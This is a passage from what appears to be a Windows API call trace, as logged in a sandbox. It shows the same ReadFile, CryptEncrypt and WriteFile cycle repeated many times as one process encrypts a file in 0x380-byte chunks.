pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.136] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.136] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.136] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.136] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.136] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.137] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.137] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.137] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.137] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.137] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.137] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.137] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.137] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.137] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.137] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.138] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.138] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.138] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.138] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.138] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.138] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.139] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.139] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.139] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.139] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.140] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.140] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.140] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.140] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.140] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.140] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.141] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.141] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.141] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.141] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.141] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.141] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.142] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.142] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.142] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.142] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.142] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.143] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.143] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.143] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.143] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.143] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.143] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 